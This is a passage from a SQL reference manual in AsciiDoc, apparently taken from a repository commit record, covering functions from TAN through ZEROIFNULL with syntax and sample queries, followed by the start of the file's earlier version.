inventory:\r\n+\r\n```\r\nSELECT SUM (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n---------------------\r\n 117683505.96\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[tan_function]]\r\n== TAN Function\r\n\r\nThe TAN function returns the tangent of a numeric value expression,\r\nwhere the expression is an angle expressed in radians.\r\n\r\nTAN is a {project-name} SQL extension.\r\n\r\n```\r\nTAN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TAN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tan]]\r\n=== Examples of TAN\r\n\r\n* This function returns the value 3.64008908293626880E-001, or\r\napproximately 0.3640, the tangent of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nTAN (0.3491)\r\n```\r\n\r\n<<<\r\n[[tanh_function]]\r\n=== TANH Function\r\n\r\nThe TANH function returns the hyperbolic tangent of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nTANH is a {project-name} SQL extension.\r\n\r\n```\r\nTANH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TANH\r\nfunction. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tanh]]\r\n=== Examples of TANH\r\n\r\n* This function returns the value 8.48283639957512960E-001 or\r\napproximately 0.8483, the hyperbolic tangent of 1.25:\r\n+\r\n```\r\nTANH (1.25)\r\n```\r\n\r\n<<<\r\n[[this_function]]\r\n== THIS Function\r\n\r\nThe THIS function is a sequence function that is used in the ROWS SINCE\r\nfunction to distinguish between the value of the column in the current\r\nrow and the value of the column in previous rows (in an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement).\r\nSee <<rows_since_function,ROWS SINCE Function>>.\r\n\r\nTHIS is a {project-name} SQL extension.\r\n\r\n```\r\nTHIS (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If the value of the expression is null, THIS returns null.\r\n\r\n[[considerations_for_this]]\r\n=== Considerations for THIS\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nYou can use the THIS function only within the ROWS SINCE function. For\r\neach row, the ROWS SINCE condition is evaluated in two steps:\r\n\r\n\r\n1. The expression for THIS is evaluated for the current row. This value\r\nbecomes a constant.\r\n2. The condition is evaluated for the result table, using a combination\r\nof the THIS constant and the data for each row in the result table,\r\nstarting with the previous row as row 1 (up to the maximum number of\r\nrows or the size of the result table).\r\n\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far. Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row and the\r\nTHIS constant is reevaluated.\r\n\r\n<<<\r\n[[examples_of_this]]\r\n=== Examples of THIS\r\n\r\n* Return the number of rows since the condition _i1_ less than a previous\r\nrow became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (THIS(i1) < i1) AS rows_since_this\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_this\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 1\r\n ?\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[timestampadd_function]]\r\n== TIMESTAMPADD Function\r\n\r\nThe TIMESTAMPADD function adds the interval of time specified by\r\n_interval-ind_ and _num_expr_ to _datetime_expr_. If the specified\r\ninterval is in years, months, or quarters and the resulting date is not\r\na valid date, the day will be rounded down to the last day of the result\r\nmonth. The type of the _datetime_expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\nTIMESTAMPADD is a {project-name} SQL extension.\r\n\r\n```\r\nTIMESTAMPADD (interval-ind, num-expr, datetime-expr)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK\r\n\r\n* `_num_expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_interval-ind_ units of time are to be added to _datetime_expr_. If\r\n_num_expr_ has a fractional portion, it is ignored. If _num_expr_ is\r\nnegative, the return value precedes _datetime_expr_ by the specified\r\namount of time.\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The type of the _datetime_expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\n<<<\r\n[[examples_of_timestampadd]]\r\n=== Examples of TIMESTAMPADD\r\n\r\n* This function adds seven days to the date specified in _start-date_:\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_DAY, 7, start-date)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_WEEK, 1, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the value DATE '1999-02-28':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_YEAR, -1, DATE '2000-02-29')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2003-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, -12, TIMESTAMP '2004-02-29 13:27:35')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2004-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, 12, TIMESTAMP '2003-02-28 13:27:35')\r\n```\r\n\r\n* This function returns the value DATE '2008-06-30':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_QUARTER, -2, DATE '2008-12-31')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2008-06-30 23:59:55':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_SECOND, -5, DATE '2008-07-01')\r\n```\r\n\r\n<<<\r\n[[timestampdiff_function]]\r\n== TIMESTAMPDIFF Function\r\n\r\nThe TIMESTAMPDIFF function returns the integer value for the number of\r\n_interval-ind_ units of time between _startdate_ and _enddate_. If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\n```\r\nTIMESTAMPDIFF (interval-ind, startdate, enddate)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK\r\n\r\n* `_startdate_` and `_enddate_`\r\n+\r\nare each of type DATE or TIMESTAMP\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by TIMESTAMPDIFF consistent across all\r\ndata types. The TIMESTAMPDIFF function makes these boundary assumptions:\r\n\r\n* A year begins at the start of January 1.\r\n* A new quarter begins on January 1, April 1, July 1, and October 1.\r\n* A week begins at the start of Sunday.\r\n* A day begins at midnight.\r\n\r\nThe result is a signed integer value equal to the number of\r\n_interval-ind_ boundaries crossed between the first and second date. For\r\nexample, the number of weeks between Sunday, January 4 and Sunday,\r\nJanuary 1 is 1. The number of months between March 31 and April 1 would\r\nbe 1 because the month boundary is crossed from March to April.\r\n\r\nThe TIMESTAMPDIFF function generates an error if the result is out of\r\nrange for integer values. For seconds, the maximum number is equivalent\r\nto approximately 68 years. The TIMESTAMPDIFF function generates an error\r\nif a difference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_timestampdiff]]\r\n=== Examples of TIMESTAMPDIFF\r\n\r\n* This function returns the value 1 because a 1-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n(\r\n SQL_TSI_SECOND\r\n, TIMESTAMP '2006-09-12 11:59:58.999999'\r\n, TIMESTAMP '2006-09-12 11:59:59.000000'\r\n)\r\n```\r\n\r\n* This function returns the value 0 because no 1-second boundaries are\r\ncrossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.00000\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a year boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n, TIMESTAMP '2007-01-01 00:00:00.000000;\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a WEEK boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value of -29:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_DAY, DATE '2004-03-01', DATE '2004-02-01')\r\n```\r\n\r\n<<<\r\n[[translate_function]]\r\n== TRANSLATE Function\r\n\r\nThe TRANSLATE function translates a character string from a source\r\ncharacter set to a target character set. The TRANSLATE function changes\r\nboth the character string data type and the character set encoding of\r\nthe string.\r\n\r\n```\r\nTRANSLATE(character-value-expression USING translation-name)\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n* `_translation-name_`\r\n+\r\nis one of these translation names:\r\n+\r\n[cols=\"25%l,25%l,25%l,25%\",options=\"header\"]\r\n|===\r\n| Translation Name | Source Character Set | Target Character Set | Comments\r\n| ISO88591TOUTF8 | ISO88591 | UTF8 | Translates ISO8859-1 characters to UTF8 characters. No data loss is possible.\r\n| UTF8TOISO88591 | UTF8 | ISO88591 | Translates UTF8 characters to ISO88591 characters. {project-name} SQL will\r\ndisplay an error if it encounters a Unicode character that cannot be converted to the target character set.\r\n|===\r\n\r\n_translation-name_ identifies the translation, source and target\r\ncharacter set. When you translate to the UTF8 character set, no data\r\nloss is possible. However, when {project-name} SQL translates a\r\n_character-value-expression_ from UTF8, it may be that certain\r\ncharacters cannot be converted to the target character set. {project-name}\r\nSQL reports an error in this case.\r\n\r\n{project-name} SQL returns a variable-length character string with character\r\nrepertoire equal to the character repertoire of the target character set\r\nof the translation and the maximum length equal to the fixed length or\r\nmaximum variable length of the source _character-value-expression_.\r\n\r\nIf you enter an illegal _translation-name_, {project-name} SQL returns an\r\nerror.\r\n\r\nIf the character set for _character-value-expression_ is different from\r\nthe source character set as specified in the _translation-name_,\r\n{project-name} SQL returns an error.\r\n\r\n<<<\r\n[[trim_function]]\r\n== TRIM Function\r\n\r\nThe TRIM function removes leading and trailing characters from a\r\ncharacter string. Every character, including multi-byte characters, is\r\ntreated as one character.\r\n\r\n```\r\nTRIM ([[trim-type] [trim-char] FROM] trim-source)\r\n```\r\n\r\n* `_trim-type_` is:\r\n+\r\n```\r\nLEADING | TRAILING | BOTH\r\n```\r\n\r\n* `_trim-type_`\r\n+\r\nspecifies whether characters are to be trimmed from the leading end\r\n(LEADING), trailing end (TRAILING), or both ends (BOTH) of\r\n_trim-source_. If you omit _trim-type_, the default is BOTH.\r\n\r\n* `_trim_char_`\r\n+\r\nis an SQL character value expression and specifies the character to be\r\ntrimmed from _trim-source. trim_char_ has a maximum length of 1. If you omit\r\n_trim_char_, SQL trims blanks (' ') from _trim-source_.\r\n\r\n* `_trim-source_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim characters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_trim]]\r\n=== Considerations for TRIM\r\n\r\n[[result_of_trim]]\r\n==== Result of TRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _trim-source_. If the\r\nsource character string is an up-shifts CHAR or VARCHAR string, the\r\nresult is an up-shifts VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_trim]]\r\n=== Examples of TRIM\r\n\r\n* Return 'Robert':\r\n+\r\n```\r\nTRIM(' Robert ')\r\n```\r\n\r\n* The EMPLOYEE table defines FIRST_NAME as CHAR(15) and LAST_NAME as\r\nCHAR(20). This expression uses the TRIM function to return the value\r\n'Robert Smith' without extra blanks:\r\n+\r\n```\r\nTRIM(first_name) || ' ' || TRIM (last_name)\r\n```\r\n\r\n<<<\r\n[[ucase_function]]\r\n== UCASE Function\r\n\r\nThe UCASE function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UCASE function is equal to\r\nthe result returned by the <<upper_function,UPPER Function>>\r\nor <<upshift_function,UPSHIFT Function>>.\r\n\r\nUCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUCASE is a {project-name} SQL extension.\r\n\r\n```\r\nUCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ucase]]\r\n=== Considerations for UCASE\r\n\r\nFor a UTF8 character_expression, the UCASE function up-shifts all\r\nlowercase or title case characters to uppercase and returns a character\r\nstring. If the argument is of type CHAR(_n_) or VARCHAR(_n_), the\r\nresult is of type VARCHAR(min(3_n_, 2048)), where the maximum length\r\nof VARCHAR is the minimum of 3_n_ or 2048, whichever is smaller.\r\n\r\nA lowercase character is a character that has the \"alphabetic\" property\r\nin Unicode Standard 2 and whose Unicode name includes lower. An\r\nuppercase character is a character that has the \"alphabetic\" property\r\nand whose Unicode name includes upper. A title case character is a\r\ncharacter that has the Unicode \"alphabetic\" property and whose Unicode\r\nname includes _title_.\r\n\r\n<<<\r\n[[examples_of_ucase]]\r\n=== Examples of UCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lcase_function,LCASE Function>>.\r\n\r\n<<<\r\n[[upper_function]]\r\n=== UPPER Function\r\n\r\nThe UPPER function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UPPER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPPER function is equal to\r\nthe result returned by the <<upshift_function,UPSHIFT Function>> or <<ucase_function,UCASE Function>>.\r\n\r\nUPPER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nUPPER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upper]]\r\n=== Examples of UPPER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lower_function,LOWER Function>>.\r\n+\r\nFor examples of when to use the UPPER function,\r\nsee <<upshift_function,UPSHIFT Function>>.\r\n\r\n<<<\r\n[[upshift_function]]\r\n=== UPSHIFT Function\r\n\r\nThe UPSHIFT function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UPSHIFT\r\ncan appear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPSHIFT function is equal\r\nto the result returned by the <<upper_function,UPPER Function>> or\r\n<<ucase_function,UCASE Function>>.\r\n\r\nUPSHIFT returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUPSHIFT is a {project-name} SQL extension.\r\n\r\n```\r\nUPSHIFT (character-expression)\r\n```\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upshift]]\r\n=== Examples of UPSHIFT \r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return a result in uppercase and\r\nlowercase letters by using the UPSHIFT, UPPER, and LOWER functions:\r\n+\r\n```\r\nSELECT UPSHIFT(custname), UPPER(custname), UCASE(custname)\r\nFROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHOTEL OREGON HOTEL OREGON HOTEL OREGON\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Perform a case-insensitive search for the DataSpeed customer:\r\n+\r\n```\r\nSELECT *\r\nFROM sales.customer\r\nWHERE UPSHIFT (custname) = 'DATASPEED';\r\n\r\nCUSTNAME STREET CITY ...\r\n---------- -------------------- --------- ...\r\nDataSpeed 300 SAN GABRIEL WAY NEW YORK ...\r\n\r\n--- 1 row(s) selected.\r\n```\r\n+\r\nIn the table, the name can be in lowercase, uppercase, or mixed case letters.\r\n\r\n* Suppose that your database includes two department tables: DEPT1 and\r\nDEPT2. Return all rows from the two tables in which the department names\r\nhave the same value regardless of case:\r\n+\r\n```\r\nSELECT *\r\nFROM persnl.dept1 D1, persnl.dept2 D2\r\nWHERE UPSHIFT(D1.deptname) = UPSHIFT(D2.deptname);\r\n```\r\n\r\n<<<\r\n[[user_function]]\r\n== USER Function\r\n\r\nThe USER function returns either the database user name associated with\r\nthe specified user ID number or the database user name of the current\r\nuser who invoked the function. The current user\r\n\r\nis the authenticated user who started the session. That database\r\nuser name is used for authorization of SQL statements in the current\r\nsession.\r\n\r\n```\r\nUSER [(user-id)]\r\n```\r\n\r\n* `_user-id_`\r\n+\r\nis the 32-bit number associated with a database user name.\r\n+\r\nThe USER function is similar to the <<authname_function,AUTHNAME Function>>\r\nand the <<current_user_function,CURRENT USER Function>>.\r\n\r\n[[considerations_for_user]]\r\n=== Considerations for USER\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_user]]\r\n=== Examples of USER\r\n\r\n* This example shows the database user name of the current user who is\r\nlogged in to the session:\r\n+\r\n```\r\nSELECT USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* This example shows the database user name associated with the user ID number, 33333:\r\n+\r\n```\r\nSELECT USER (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[variance_function]]\r\n== VARIANCE Function\r\n\r\nVARIANCE is an aggregate function that returns the statistical variance\r\nof a set of numbers. VARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nVARIANCE ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe VARIANCE of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the VARIANCE function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the variance. _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the VARIANCE\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the variance. _weight_ cannot contain an\r\naggregate function or a subquery. _weight_ is defined on the same table\r\nas _expression_. The one-column table derived from the evaluation of\r\n_expression_ and the one-column table derived from the evaluation of\r\n_weight_ must have the same cardinality.\r\n\r\n[[considerations_for_variance]]\r\n=== Considerations for VARIANCE\r\n\r\n[[definition_of_variance]]\r\n==== Definition of VARIANCE\r\n\r\nSuppose that _vi_ are the values in the one-column table derived from\r\nthe evaluation of _expression_. _N_ is the cardinality of this\r\none-column table that is the result of applying the _expression_ to each\r\nrow of the source table and eliminating rows that are null.\r\n\r\nIf _weight_ is specified, _wi_ are the values derived from the\r\nevaluation of _weight_. _N_ is the cardinality of the two-column table\r\nthat is the result of applying the _expression_ and _weight_ to each row\r\nof the source table and eliminating rows that have nulls in either\r\ncolumn.\r\n\r\n===== Definition When Weight Is Not Specified\r\n\r\nIf _weight_ is not specified, the statistical variance of the values in\r\nthe one-column result table is defined as:\r\n\r\nwhere _vi_ is the i-th value of _expression_, _v_ is the average value\r\nexpressed in the common data type, and N is the cardinality of the\r\nresult table.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (when weight is not specified), {project-name} SQL returns a\r\ndefault value of zero (and no error) if the number of rows in the table,\r\nor a group of the table, is equal to 1.\r\n\r\n===== Definition When Weight Is Specified\r\n\r\nIf _weight_ is specified, the statistical variance of the values in the\r\ntwo-column result table is defined as:\r\n\r\nwhere vi is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, _vw_ is the weighted average value expressed in the common\r\ndata type, and N is the cardinality of the result table.\r\n\r\n===== Weighted Average\r\n\r\nThe weighted average _vw_ of _vi_ and _wi_ is defined as:\r\n\r\nwhere vi is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, and N is the cardinality of the result table.\r\n\r\n\r\n[[data_type_of_the_result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nVARIANCE (SALARY) VARIANCE (SALARY * 1.1)\r\nVARIANCE (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[variance_nulls]]\r\n==== Nulls\r\n\r\nVARIANCE is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, VARIANCE returns NULL.\r\n\r\n\r\n[[float54_and_double_precision_data]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nVARIANCE. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during\r\nthe computation of VARIANCE(x), then a numeric overflow occurs.\r\n\r\n[[examples_of_variance]]\r\n=== Examples of VARIANCE\r\n\r\n* Compute the variance of the salary of the current employees:\r\n+\r\n```\r\nSELECT VARIANCE(salary) AS Variance_Salary FROM persnl.employee;\r\n\r\nVARIANCE_SALARY\r\n-------------------------\r\n 1.27573263588496116E+009\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the variance of the cost of parts in the current inventory:\r\n+\r\n```\r\nSELECT VARIANCE (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 5.09652410092950336E+013\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[week_function]]\r\n== WEEK Function\r\n\r\nThe WEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 54 that represents the\r\ncorresponding week of the year. If the year begins on a Sunday, the\r\nvalue 1 will be returned for any datetime that occurs in the first 7\r\ndays of the year. Otherwise, the value 1 will be returned for any\r\ndatetime that occurs in the partial week before the start of the first\r\nSunday of the year. The value 53 is returned for datetimes that occur in\r\nthe last full or partial week of the year except for leap years that\r\nstart on Saturday where December 31 is in the 54th full or partial week.\r\n\r\nWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_week]]\r\n=== Examples of WEEK\r\n\r\n* Return an integer that represents the week of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, WEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------\r\n2008-04-10 2008-04-21 08:15:00.000000 |15\r\n```\r\n\r\n<<<\r\n[[year_function]]\r\n== YEAR Function\r\n\r\nThe YEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value that represents the year.\r\n\r\nYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_year]]\r\n=== Examples of YEAR\r\n\r\n* Return an integer that represents the year from the start date column in\r\nthe project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, YEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2008\r\n```\r\n\r\n\r\n<<<\r\n[[zeroifnull_function]]\r\n== ZEROIFNULL Function\r\n\r\nThe ZEROIFNULL function returns a value of zero if the expression if\r\nNULL. Otherwise, it returns the value of the expression.\r\n\r\n```\r\nZEROIFNULL (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. It must be a numeric data type.\r\n\r\n[[examples_of_zeroifnull]]\r\n=== Examples of ZEROIFNULL\r\n\r\n* ZEROIFNULL returns the value of the column named salary whenever the\r\ncolumn value is not NULL and it returns 0 whenever the column value is\r\nNULL.\r\n+\r\n```\r\nZEROIFNULL (salary)\r\n```\r\n\r\n","old_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[[sql_functions_and_expressions]]\r\n= SQL Functions and Expressions\r\n\r\nThis section describes the syntax and semantics of specific functions\r\nand expressions that you can use in {project-name} SQL statements. The\r\nfunctions and expressions are categorized according to their\r\nfunctionality.\r\n\r\n[[standard_normalization]]\r\n== Standard Normalization\r\n\r\nFor datetime functions, the definition of standard normalization is: If\r\nthe ending day of the resulting date is invalid, the day will be rounded\r\nDOWN to the last day of the result month.\r\n\r\n== Aggregate (Set) Functions\r\n\r\nAn aggregate (or set) function operates on a group or groups of rows\r\nretrieved by the SELECT statement or the subquery in which the aggregate\r\nfunction appears.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<avg_function,AVG Function>> | Computes the average of a group of numbers derived from the evaluation\r\nof the expression argument of the function.\r\n| <<count_function,COUNT Function>> | Counts the number of rows that result from a query (by using\r\n*) or the number of rows that contain a distinct value in the one-column\r\ntable derived from the expression argument of the function (optionally\r\ndistinct values).\r\n| <<max_function,MAX\/MAXIMUM Function>> | Determines a maximum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<min_function,MIN Function>> | Determines a minimum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<stddev_function,STDDEV Function>> | Computes the statistical standard deviation of a group of numbers\r\nderived from the evaluation of the expression argument of the function.\r\nThe numbers can be weighted.\r\n| <<sum_function,SUM Function>> | Computes the sum of a group of numbers derived from the evaluation of\r\nthe expression argument of the function.\r\n\"VARIANCE Function\" \r\nComputes the statistical variance of a group of numbers derived from the\r\nevaluation of the expression argument of the function. The numbers can\r\nbe weighted.\r\n|===\r\n\r\n\r\nColumns and expressions can be arguments of an aggregate function. The\r\nexpressions cannot contain aggregate functions or subqueries.\r\n\r\nAn aggregate function can accept an argument specified as DISTINCT,\r\nwhich eliminates duplicate values before the aggregate function is\r\napplied. See <<distinct_aggregate_functions,DISTINCT Aggregate Functions>>.\r\n\r\nIf you include a GROUP BY clause in the SELECT statement, the columns\r\nyou refer to in the select list must be either grouping columns or\r\narguments of an aggregate function. If you do not 